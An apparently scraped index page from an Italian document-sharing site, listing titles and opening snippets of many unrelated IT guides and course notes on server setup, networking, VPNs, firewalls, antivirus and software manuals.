Banca dati Professioniste in rete per le P.A. Guida all uso per le Professioniste Banca dati Professioniste in rete per le P.A. Guida all uso per le Professioniste versione 2.1 24/09/2015 aggiornamenti: 23-set-2015; 24-set-2015 Autore: Francesco Brunetta (http://www.francescobrunetta.it/)

Dettagli

Apache 2, PHP5, MySQL 5

Apache 2, PHP5, MySQL 5 Installazione di Apache 2, PHP5, MySQL 5 Corso Interazione Uomo Macchina AA 2005/2006 Installazione e Versioni Considerazione le versioni più recenti dei vari software così da poterne sperimentare le caratteristiche

Dettagli

Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica.

Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica. Tecnologie informatiche ACCESSO REMOTO CON WINDOWS Con accesso remoto s'intende la possibilità di accedere ad uno o più Personal Computer con un modem ed una linea telefonica. Un esempio di tale servizio

Dettagli

ICARO Terminal Server per Aprile

ICARO Terminal Server per Aprile ICARO Terminal Server per Aprile Icaro è un software aggiuntivo per Aprile (gestionale per centri estetici e parrucchieri) con funzionalità di terminal server: gira sullo stesso pc dove è installato il

Dettagli

Una minaccia dovuta all uso dell SNMP su WLAN

Una minaccia dovuta all uso dell SNMP su WLAN Una minaccia dovuta all uso dell SNMP su WLAN Gianluigi Me, gianluigi@wi-fiforum.com Traduzione a cura di Paolo Spagnoletti Introduzione Gli attacchi al protocollo WEP compromettono la confidenzialità

Dettagli

File, Modifica, Visualizza, Strumenti, Messaggio

File, Modifica, Visualizza, Strumenti, Messaggio Guida installare account in Outlook Express Introduzione Questa guida riguarda di sicuro uno dei programmi maggiormente usati oggi: il client di posta elettronica. Tutti, ormai, siamo abituati a ricevere

Dettagli

Installazione & Configurazione Php e MySQL su Mac Os X. Php

Installazione & Configurazione Php e MySQL su Mac Os X. Php Installazione & Configurazione Php e MySQL su Mac Os X Php PHP è un linguaggio di scripting interpretato, con licenza Open Source, originariamente concepito per la realizzazione di pagine web dinamiche.

Dettagli

GUIDA UTENTE PRIMA NOTA SEMPLICE

GUIDA UTENTE PRIMA NOTA SEMPLICE GUIDA UTENTE PRIMA NOTA SEMPLICE (Vers. 2.0.0) Installazione... 2 Prima esecuzione... 5 Login... 6 Funzionalità... 7 Prima Nota... 8 Registrazione nuovo movimento... 10 Associazione di file all operazione...

Dettagli

capitolo 8 LA CHECKLIST PER LA VALUTV ALUTAZIONEAZIONE TECNOLOGICA

capitolo 8 LA CHECKLIST PER LA VALUTV ALUTAZIONEAZIONE TECNOLOGICA capitolo 8 LA CHECKLIST PER LA VALUTV ALUTAZIONEAZIONE TECNOLOGICA 8.1 ISTRUZIONI PER IL VALUTATORE Campioni Il processo di valutazione tecnologica si basa su un campione del prodotto, precedentemente

Dettagli

INDIRIZZI IP ARCHITETTURA GENERALE DEGLI INDIRIZZI IP FORME DI INDIRIZZI IP CINQUE FORME DI INDIRIZZI IP

INDIRIZZI IP ARCHITETTURA GENERALE DEGLI INDIRIZZI IP FORME DI INDIRIZZI IP CINQUE FORME DI INDIRIZZI IP INDIRIZZI IP ARCHITETTURA GENERALE DEGLI INDIRIZZI IP Un indirizzo IP è composto da 32 bit. Generalmente, per convenienza, è presentato in decimale: 4 ottetti (bytes) separati da un punto. Ogni rete fisica

Dettagli

MODELLO CLIENT/SERVER. Gianluca Daino Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena daino@unisi.it

MODELLO CLIENT/SERVER. Gianluca Daino Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena daino@unisi.it MODELLO CLIENT/SERVER Gianluca Daino Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena daino@unisi.it POSSIBILI STRUTTURE DEL SISTEMA INFORMATIVO La struttura di un sistema informativo

Dettagli

La VPN con il FRITZ!Box - parte II. La VPN con il FRITZ!Box Parte II

La VPN con il FRITZ!Box - parte II. La VPN con il FRITZ!Box Parte II La VPN con il FRITZ!Box Parte II 1 Descrizione Come già descritto nella parte I della mini guida, Una VPN, Virtual Private Network, consiste in una sorta di tunnel in grado di collegare tra loro due o

Dettagli

FTP. Appunti a cura del prof. ing. Mario Catalano

FTP. Appunti a cura del prof. ing. Mario Catalano FTP Appunti a cura del prof. ing. Mario Catalano Il protocollo FTP 1/2 Attraverso il protocollo FTP (File Transfer Protocol) è possibile trasferire uno o più files di qualsiasi tipo tra due macchine Tale

Dettagli

PROCEDURA INVENTARIO DI MAGAZZINO di FINE ESERCIZIO (dalla versione 3.2.0)

PROCEDURA INVENTARIO DI MAGAZZINO di FINE ESERCIZIO (dalla versione 3.2.0) PROCEDURA INVENTARIO DI MAGAZZINO di FINE ESERCIZIO (dalla versione 3.2.0) (Da effettuare non prima del 01/01/2011) Le istruzioni si basano su un azienda che ha circa 1000 articoli, che utilizza l ultimo

Dettagli

Applicazioni web centrati sui dati (Data-centric web applications)

Applicazioni web centrati sui dati (Data-centric web applications) Applicazioni web centrati sui dati (Data-centric web applications) 1 ALBERTO BELUSSI ANNO ACCADEMICO 2009/2010 WEB La tecnologia del World Wide Web (WWW) costituisce attualmente lo strumento di riferimento

Dettagli

TRASMISSIONE RAPPORTO ARBITRALE IN FORMATO PDF

TRASMISSIONE RAPPORTO ARBITRALE IN FORMATO PDF TRASMISSIONE RAPPORTO ARBITRALE IN FORMATO PDF Come da disposizioni di inizio stagione, alcune Delegazioni provinciali hanno richiesto la trasmissione dei referti arbitrali solo tramite fax o tramite mail.

Dettagli

Note per scaricare e installare il software cliccando alla pagina DOWNLOAD del sito,

Note per scaricare e installare il software cliccando alla pagina DOWNLOAD del sito, Come ben sapete, anch io,come voi, sono golosa di schemi,trovati in internet e nei giornali, e questo comporta, soprattutto per gli schemi virtuali, che devo cercare una soluzione per evitare che il mio

Dettagli

NAS 224 Accesso remoto Configurazione manuale

NAS 224 Accesso remoto Configurazione manuale NAS 224 Accesso remoto Collegamento al NAS ASUSTOR tramite Internet A S U S T O R C O L L E G E OBIETTIVI DEL CORSO Al termine di questo corso si dovrebbe essere in grado di: 1. Configurare il sistema

Dettagli

Guida all installazione e configurazione di Joomla 1.5

Guida all installazione e configurazione di Joomla 1.5 Guida realizzata e rilasciata dallo staff di Joomlaservice.org Joomla 1.5 lascia finalmente la fase beta per la RC1, in attesa di approdare alla versione stabile. Le differenze tra un installazione di

Dettagli

FASE 1: Definizione del tema, degli obiettivi e del target con il cliente... (da cui dipendono le scelte successive!)

FASE 1: Definizione del tema, degli obiettivi e del target con il cliente... (da cui dipendono le scelte successive!) Panoramica sul Web design: FASE 1: Definizione del tema, degli obiettivi e del target con il cliente... (da cui dipendono le scelte successive!) FASE 2: Definire se lavorare su un CMS (es Joomla, Wordpress,

Dettagli

LA GESTIONE DELLE VISITE CLIENTI VIA WEB

LA GESTIONE DELLE VISITE CLIENTI VIA WEB LA GESTIONE DELLE VISITE CLIENTI VIA WEB L applicazione realizzata ha lo scopo di consentire agli agenti l inserimento via web dei dati relativi alle visite effettuate alla clientela. I requisiti informatici

Dettagli

COMUNICAZIONE UTENTI SISTEMI-PROFIS INSTALLAZIONE GE.RI.CO. 2015 e PARAMETRI2015

COMUNICAZIONE UTENTI SISTEMI-PROFIS INSTALLAZIONE GE.RI.CO. 2015 e PARAMETRI2015 COMUNICAZIONE UTENTI SISTEMI-PROFIS INSTALLAZIONE GE.RI.CO. 2015 e PARAMETRI2015 Vicenza, 3 giugno 2015 Gentile cliente, si ricorda che a partire dall aggiornamento PROFIS 2011.1 è stato automatizzato

Dettagli

Scritto da Administrator Martedì 09 Settembre 2008 12:57 - Ultimo aggiornamento Domenica 12 Giugno 2011 00:48

Scritto da Administrator Martedì 09 Settembre 2008 12:57 - Ultimo aggiornamento Domenica 12 Giugno 2011 00:48 Sommario - Introduzione - Un modo migliore... - Tunnel auto-terminante - Ulteriori accorgimenti - Note Introduzione Il seguente articolo dovrebbe aiutare chiunque fosse interessato alla sicurezza nelle

Dettagli

1. RETI INFORMATICHE CORSO DI LAUREA IN INGEGNERIA INFORMATICA SPECIFICHE DI PROGETTO A.A. 2013/2014. 1.1 Lato client

1. RETI INFORMATICHE CORSO DI LAUREA IN INGEGNERIA INFORMATICA SPECIFICHE DI PROGETTO A.A. 2013/2014. 1.1 Lato client RETI INFORMATICHE - SPECIFICHE DI PROGETTO A.A. 2013/2014 1. RETI INFORMATICHE CORSO DI LAUREA IN INGEGNERIA INFORMATICA SPECIFICHE DI PROGETTO A.A. 2013/2014 Il progetto consiste nello sviluppo di un

Dettagli

Indice. 1 Il monitoraggio del progetto formativo --------------------------------------------------------------- 3. 2 di 6

Indice. 1 Il monitoraggio del progetto formativo --------------------------------------------------------------- 3. 2 di 6 LEZIONE MONITORARE UN PROGETTO FORMATIVO. UNA TABELLA PROF. NICOLA PAPARELLA Indice 1 Il monitoraggio del progetto formativo --------------------------------------------------------------- 3 2 di 6 1 Il

Dettagli

Capitolo 2. Operazione di limite

Capitolo 2. Operazione di limite Capitolo 2 Operazione di ite In questo capitolo vogliamo occuparci dell operazione di ite, strumento indispensabile per scoprire molte proprietà delle funzioni. D ora in avanti riguarderemo i domini A

Dettagli

FPf per Windows 3.1. Guida all uso

FPf per Windows 3.1. Guida all uso FPf per Windows 3.1 Guida all uso 3 Configurazione di una rete locale Versione 1.0 del 18/05/2004 Guida 03 ver 02.doc Pagina 1 Scenario di riferimento In figura è mostrata una possibile soluzione di rete

Dettagli

Corso basi di dati Installazione e gestione di PWS

Corso basi di dati Installazione e gestione di PWS Corso basi di dati Installazione e gestione di PWS Gianluca Di Tomassi Email: ditomass@dia.uniroma3.it Università di Roma Tre Cosa è PWS? Il Personal Web Server altro non è che una versione ridotta del

Dettagli

11/02/2015 MANUALE DI INSTALLAZIONE DELL APPLICAZIONE DESKTOP TELEMATICO VERSIONE 1.0

11/02/2015 MANUALE DI INSTALLAZIONE DELL APPLICAZIONE DESKTOP TELEMATICO VERSIONE 1.0 11/02/2015 MANUALE DI INSTALLAZIONE DELL APPLICAZIONE DESKTOP TELEMATICO VERSIONE 1.0 PAG. 2 DI 38 INDICE 1. PREMESSA 3 2. SCARICO DEL SOFTWARE 4 2.1 AMBIENTE WINDOWS 5 2.2 AMBIENTE MACINTOSH 6 2.3 AMBIENTE

Dettagli

Domande e risposte su Avira ProActiv Community

Domande e risposte su Avira ProActiv Community Domande e risposte su Avira ProActiv Community Avira AntiVir versione 10 sfrutta un innovativa tecnologia protettiva cloud-based, denominata ProActiv, che identifica e blocca i nuovi virus non appena questi

Dettagli

Impostare il browser per navigare in sicurezza Opzioni di protezione

Impostare il browser per navigare in sicurezza Opzioni di protezione Impostare il browser per navigare in sicurezza Opzioni di protezione Data la crescente necessità di sicurezza e tutela dei propri dati durante la navigazione in rete, anche gli stessi browser si sono aggiornati,

Dettagli

IBM SPSS Statistics per Linux - Istruzioni di installazione (Licenza per sito)

IBM SPSS Statistics per Linux - Istruzioni di installazione (Licenza per sito) IBM SPSS Statistics per Linux - Istruzioni di installazione (Licenza per sito) Le seguenti istruzioni sono relative all installazione di IBM SPSS Statistics versione 21 con licenza per sito. Questo documento

Dettagli

Siti web centrati sui dati (Data-centric web applications)

Siti web centrati sui dati (Data-centric web applications) Siti web centrati sui dati (Data-centric web applications) 1 A L B E R T O B E L U S S I A N N O A C C A D E M I C O 2 0 1 2 / 2 0 1 3 WEB La tecnologia del World Wide Web (WWW) costituisce attualmente

Dettagli

Kroll Ontrack Servizi RDR Guida rapida

Kroll Ontrack Servizi RDR Guida rapida Kroll Ontrack Servizi RDR Guida rapida Selezionare una macchina Windows che sia in grado di funzionare come client remoto. É possibile utilizzare Windows XP e versioni successive ad eccezione di Windows

Dettagli

L archiviazione della posta elettronica può aiutarci a recuperare spazio senza costringerci a cestinare documenti importanti

L archiviazione della posta elettronica può aiutarci a recuperare spazio senza costringerci a cestinare documenti importanti L archiviazione della posta elettronica può aiutarci a recuperare spazio senza costringerci a cestinare documenti importanti Potete immaginare un ufficio senza archivio? Sarebbe un inferno. Dover rintracciare

Dettagli

Progettare un Firewall

Progettare un Firewall Progettare un Firewall Danilo Demarchi danilo@cuneo.linux.it GLUG Cuneo Corso Sicurezza 2006 Concetti introduttivi Come pensare un Firewall Argomenti trattati I Gli strumenti del Firewall Gli strumenti

Dettagli

MyFRITZ!, Dynamic DNS e Accesso Remoto

MyFRITZ!, Dynamic DNS e Accesso Remoto MyFRITZ!, Dynamic DNS e Accesso Remoto 1 Introduzione In questa mini-guida illustreremo come accedere da Internet al vostro FRITZ!Box in ufficio o a casa, quando siete in mobilità o vi trovate in luogo

Dettagli

L avvocato hacker. Genova, 15 marzo 2012. Prof. Giovanni Ziccardi Università degli Studi di Milano

L avvocato hacker. Genova, 15 marzo 2012. Prof. Giovanni Ziccardi Università degli Studi di Milano L avvocato hacker Genova, 15 marzo 2012 Prof. Giovanni Ziccardi Università degli Studi di Milano L ultimo hacker I temi oggetto d attenzione! La cifratura dei dati con l uso della crittografia.! La sicurezza

Dettagli

Introduzione alla consultazione dei log tramite IceWarp Log Analyzer

Introduzione alla consultazione dei log tramite IceWarp Log Analyzer Introduzione alla consultazione dei log tramite IceWarp Log Analyzer L Analizzatore di Log è uno strumento che consente un'analisi statistica e logica dei file di log generati dal server. Lo strumento

Dettagli

Lande Immortali: Riepilogo dello Stato di Avanzamento del Progetto

Lande Immortali: Riepilogo dello Stato di Avanzamento del Progetto Lande Immortali: Riepilogo dello Stato di Avanzamento del Progetto Progetto a cura di Martino Michele Matricola: 0124000461 Miglio Stefano Matricola: 0124000462 Obiettivi Iniziali Si intende realizzare

Dettagli

Stampe in rete Implementazione corretta

Stampe in rete Implementazione corretta NETWORK PRINT SERVERS Articolo Stampe in rete Implementazione corretta Created: June 3, 2005 Last updated: June 3, 2005 Rev:.0 INDICE INTRODUZIONE 3 INFRASTRUTTURA DELLE STAMPE IN RETE 3. Stampa peer-to-peer

Dettagli

FtpZone Guida all uso Versione 2.1

FtpZone Guida all uso Versione 2.1 FtpZone Guida all uso Versione 2.1 La presente guida ha l obiettivo di spiegare le modalità di utilizzo del servizio FtpZone fornito da E-Mind Srl. All attivazione del servizio E-Mind fornirà solamente

Dettagli

PORTALE CLIENTI Manuale utente

PORTALE CLIENTI Manuale utente PORTALE CLIENTI Manuale utente Sommario 1. Accesso al portale 2. Home Page e login 3. Area riservata 4. Pagina dettaglio procedura 5. Pagina dettaglio programma 6. Installazione dei programmi Sistema operativo

Dettagli

5-1 FILE: CREAZIONE NUOVO DOCUMENTO

5-1 FILE: CREAZIONE NUOVO DOCUMENTO Capittol lo 5 File 5-1 FILE: CREAZIONE NUOVO DOCUMENTO In Word è possibile creare documenti completamente nuovi oppure risparmiare tempo utilizzando autocomposizioni o modelli, che consentono di creare

Dettagli

StoneFax User Guide. (Settembre 2011 ver.1.1) StoneFax-User-Guide-ita-1.1.docx 1-10 www.imagicle.com

StoneFax User Guide. (Settembre 2011 ver.1.1) StoneFax-User-Guide-ita-1.1.docx 1-10 www.imagicle.com StoneFax User Guide (Settembre 2011 ver.1.1) StoneFax-User-Guide-ita-1.1.docx 1-10 www.imagicle.com Copyright 2011 Imagicle Spa Tutti i diritti riservati. Imagicle e il logo Imagicle sono marchi registrati

Dettagli

Sistema Gestionale FIPRO. Dott. Enea Belloni Ing. Andrea Montagnani

Sistema Gestionale FIPRO. Dott. Enea Belloni Ing. Andrea Montagnani Sistema Gestionale FIPRO Dott. Enea Belloni Ing. Andrea Montagnani Firenze, 29 Aprile 2010 Sommario della presentazione Il sistema informatico per la gestione progetti FIPRO L utente presentatore: diritti

Dettagli

Inizializzazione degli Host. BOOTP e DHCP

Inizializzazione degli Host. BOOTP e DHCP BOOTP e DHCP a.a. 2002/03 Prof. Vincenzo Auletta auletta@dia.unisa.it http://www.dia.unisa.it/~auletta/ Università degli studi di Salerno Laurea e Diploma in Informatica 1 Inizializzazione degli Host Un

Dettagli

EXPLOit Content Management Data Base per documenti SGML/XML

EXPLOit Content Management Data Base per documenti SGML/XML EXPLOit Content Management Data Base per documenti SGML/XML Introduzione L applicazione EXPLOit gestisce i contenuti dei documenti strutturati in SGML o XML, utilizzando il prodotto Adobe FrameMaker per

Dettagli

Live Trading 2015. Trading in diretta con forzaforex. Il servizio è attivo tutte le settimane, dal lunedì al venerdì.

Live Trading 2015. Trading in diretta con forzaforex. Il servizio è attivo tutte le settimane, dal lunedì al venerdì. Live Trading 2015 Trading in diretta con forzaforex Il servizio è attivo tutte le settimane, dal lunedì al venerdì. Orario di diretta trading (ora Italiana) Mattina: dalle 10 alle 12 Pomeriggio: dalle

Dettagli

Reti di Telecomunicazione Lezione 6

Reti di Telecomunicazione Lezione 6 Reti di Telecomunicazione Lezione 6 Marco Benini Corso di Laurea in Informatica marco.benini@uninsubria.it Lo strato di applicazione protocolli Programma della lezione Applicazioni di rete client - server

Dettagli

Analisi sensitività. Strumenti per il supporto alle decisioni nel processo di Valutazione d azienda

Analisi sensitività. Strumenti per il supporto alle decisioni nel processo di Valutazione d azienda Analisi sensitività. Strumenti per il supporto alle decisioni nel processo di Valutazione d azienda Premessa Con l analisi di sensitività il perito valutatore elabora un range di valori invece di un dato

Dettagli

CONTENT MANAGEMENT SY STEM

CONTENT MANAGEMENT SY STEM CONTENT MANAGEMENT SY STEM I NDI CE I NTRODUZI ONE Accesso al CMS 1) CONTENUTI 1.1 I nserimento, modifica e cancellazione dei contenuti 1.2 Sezioni, categorie e sottocategorie 2) UTENTI 3) UP LOAD FILES

Dettagli

Guida all'installazione del CMS Os-Commerce

Guida all'installazione del CMS Os-Commerce Guida all'installazione del CMS Os-Commerce VOLA S.p.A. - Traversa Via Libeccio snc - zona industriale Cotone, 55049 Viareggio (LU) tel +39 0584 43671 - fax +39 0584 436700 http://www.vola.it info@vola.it

Dettagli

Esistono sostanzialmente due metodi per inserire un video online (preso da siti di video sharing come Youtube) in un powerpoint slideshow :

Esistono sostanzialmente due metodi per inserire un video online (preso da siti di video sharing come Youtube) in un powerpoint slideshow : Arricchire con contenuti multimediali uno slideshow di Powerpoint, sia per fare presentazioni a carattere professionale, didattico o per presentare una tesi-relazione, in determinate circostanze può veramente

Dettagli

Visual basic base Lezione 01. L'ambiente di sviluppo

Visual basic base Lezione 01. L'ambiente di sviluppo L'ambiente di sviluppo L'ambiente di sviluppo Visual basic è un linguaggio di programmazione Microsoft. In questo corso prenderemo in considerazione, l'ultima versione. net di questo linguaggio. Microsoft

Dettagli

uadro Soluzioni software per L archiviazione elettronica dei documenti Gestione Aziendale Fa quadrato attorno alla tua azienda

uadro Soluzioni software per L archiviazione elettronica dei documenti Gestione Aziendale Fa quadrato attorno alla tua azienda Fa quadrato attorno alla tua azienda Soluzioni software per L archiviazione elettronica dei documenti Perché scegliere Q Archiviazione Elettronica dei Documenti? Tale applicativo si pone come obbiettivo

Dettagli

CONFIGURARE SAMBA 3 SU SUSE LINUX 9.1/9.2

CONFIGURARE SAMBA 3 SU SUSE LINUX 9.1/9.2 CONFIGURARE SAMBA 3 SU SUSE LINUX 9.1/9.2 1. INTRODUZIONE In questa guida si illustra la procedura di configurazione di samba 3 su SuSE Linux 9.1 e su SuSE Linux 9.2. Saranno brevemente illustrate le operazioni

Dettagli

Product Shipping Cost Guida d'installazione ed Utilizzo

Product Shipping Cost Guida d'installazione ed Utilizzo Guida d'installazione ed Utilizzo Installazione Per installare il modulo è sufficiente copiare la cartella app del pacchetto del modulo nella cartella principale dell'installazione di Magento dove è già

Dettagli

Guida rapida alla Webconferencing

Guida rapida alla Webconferencing Guida rapida alla Webconferencing Questa Guida rapida illustra le operazioni più frequenti nell utilizzo di MeetIn Web. In particolare: Eseguire il settaggio iniziale di dispositivi audio e video Connettersi

Dettagli

Sistema operativo. Sommario. Sistema operativo...1 Browser...1. Convenzioni adottate

Sistema operativo. Sommario. Sistema operativo...1 Browser...1. Convenzioni adottate MODULO BASE Quanto segue deve essere rispettato se si vuole che le immagini presentate nei vari moduli corrispondano, con buona probabilità, a quanto apparirà nello schermo del proprio computer nel momento

Dettagli

Rsync su GNU/Linux e su Windows? (Backup sincronizzato su disco di rete e/o RAID1 su server FreeNAS)

Rsync su GNU/Linux e su Windows? (Backup sincronizzato su disco di rete e/o RAID1 su server FreeNAS) Rsync su GNU/Linux e su Windows? (Backup sincronizzato su disco di rete e/o RAID1 su server FreeNAS) Augusto Scatolini (webmaster@comunecampagnano.it) Ver. 1.0 Gennaio 2011 rsync è un software per Unix

Dettagli

Proteggiamo il PC con il Firewall di Windows Vista

Proteggiamo il PC con il Firewall di Windows Vista Proteggiamo il PC con il Firewall di Windows Vista Il momento in cui un computer è più a rischio e soggetto ad attacchi informatici, è quando è connesso a internet. Per proteggere il nostro PC ed evitare

Dettagli

Dal sito: http://assistenza.tiscali.it/networking/software/wingate/index.html. Articolo recensito da Paolo Latella

Dal sito: http://assistenza.tiscali.it/networking/software/wingate/index.html. Articolo recensito da Paolo Latella Dal sito: http://assistenza.tiscali.it/networking/software/wingate/index.html Articolo recensito da Paolo Latella Configurazione server In queste pagine desideriamo illustrare le possibilità e le configurazioni

Dettagli

InitZero s.r.l. Via P. Calamandrei, 24-52100 Arezzo email: info@initzero.it

InitZero s.r.l. Via P. Calamandrei, 24-52100 Arezzo email: info@initzero.it izticket Il programma izticket permette la gestione delle chiamate di intervento tecnico. E un applicazione web, basata su un potente application server java, testata con i più diffusi browser (quali Firefox,

Dettagli

Guida informatica per l associazione #IDEA

Guida informatica per l associazione #IDEA Guida informatica per l associazione #IDEA Questa guida vi spiegherà come utilizzare al meglio gli strumenti informatici che utilizza l associazione #IDEA in modo da facilitare il coordinamento con tutti

Dettagli

Nelle reti di calcolatori, le porte (traduzione impropria del termine. port inglese, che in realtà significa porto) sono lo strumento

Nelle reti di calcolatori, le porte (traduzione impropria del termine. port inglese, che in realtà significa porto) sono lo strumento I protocolli del livello di applicazione Porte Nelle reti di calcolatori, le porte (traduzione impropria del termine port inglese, che in realtà significa porto) sono lo strumento utilizzato per permettere

Dettagli

Dynamic DNS e Accesso Remoto

Dynamic DNS e Accesso Remoto Dynamic DNS e Accesso Remoto 1 Descrizione Il Dynamic DNS è una tecnologia che consente di associare un nome host DNS ad un indirizzo IP assegnato allo stesso host, anche se questo cambia nel tempo. In

Dettagli

I MODULI Q.A.T. PANORAMICA. La soluzione modulare di gestione del Sistema Qualità Aziendale

I MODULI Q.A.T. PANORAMICA. La soluzione modulare di gestione del Sistema Qualità Aziendale La soluzione modulare di gestione del Sistema Qualità Aziendale I MODULI Q.A.T. - Gestione clienti / fornitori - Gestione strumenti di misura - Gestione verifiche ispettive - Gestione documentazione del

Dettagli

Start > Pannello di controllo > Prestazioni e manutenzione > Sistema Oppure clic destro / Proprietà sull icona Risorse del computer su Desktop

Start > Pannello di controllo > Prestazioni e manutenzione > Sistema Oppure clic destro / Proprietà sull icona Risorse del computer su Desktop Installare e configurare una piccola rete locale (LAN) Usando i Protocolli TCP / IP (INTRANET) 1 Dopo aver installato la scheda di rete (seguendo le normali procedure di Aggiunta nuovo hardware), bisogna

Dettagli

FAQ 07/01 - ACCORGIMENTI PER LA VISUALIZZAZIONE DEL NUOVO SITO ISS

FAQ 07/01 - ACCORGIMENTI PER LA VISUALIZZAZIONE DEL NUOVO SITO ISS Servizio Informatico, Biblioteca, Documentazione ed Attività Settore I Informatica Gruppo Web FAQ 07/01 - ACCORGIMENTI PER LA VISUALIZZAZIONE DEL NUOVO SITO ISS Febbraio 2007 Revisione 200702161541 Indice

Dettagli